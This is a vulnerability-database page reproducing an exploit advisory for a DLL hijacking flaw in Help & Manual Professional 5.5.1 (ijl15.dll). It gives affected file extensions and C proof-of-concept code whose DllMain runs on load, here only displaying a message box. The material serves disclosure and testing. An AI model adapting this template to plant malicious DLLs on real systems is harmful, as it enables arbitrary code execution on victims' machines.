Lucene search
K

Help And Manual Professional Edition 5.5.1 DLL Hijack

🗓️ 14 Apr 2011 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Help & Manual 5.5.1 DLL Hijacking Vulnerabilit

Code
`/*  
  
  
Help & Manual Professional Edition 5.5.1 (ijl15.dll) DLL Hijacking Exploit  
  
Vendor: EC Software GmbH  
Product web page: http://www.helpandmanual.com  
Affected version: 5.5.1 Build 1296  
  
Summary: Help & Manual 5 is a single-source help authoring and content  
management system for both single and multi-author editing.  
  
Desc: Help & Manual suffers from a DLL hijacking vulnerability that enables  
the attacker to execute arbitrary code on the affected machine. The vulnerable  
extensions are hmxz, hmxp, hmskin, hmx, hm3, hpj, hlp and chm thru ijl15.dll  
Intel's library.  
  
Tested on: Microsoft Windows XP Professional SP3 EN  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
liquidworm gmail com  
  
  
Advisory ID: ZSL-2011-5009  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5009.php  
  
  
06.04.2011  
  
  
*/  
  
  
#include <windows.h>  
  
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)  
{  
  
switch (fdwReason)  
{  
case DLL_PROCESS_ATTACH:  
dll_mll();  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
  
return TRUE;  
}  
  
int dll_mll()  
{  
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation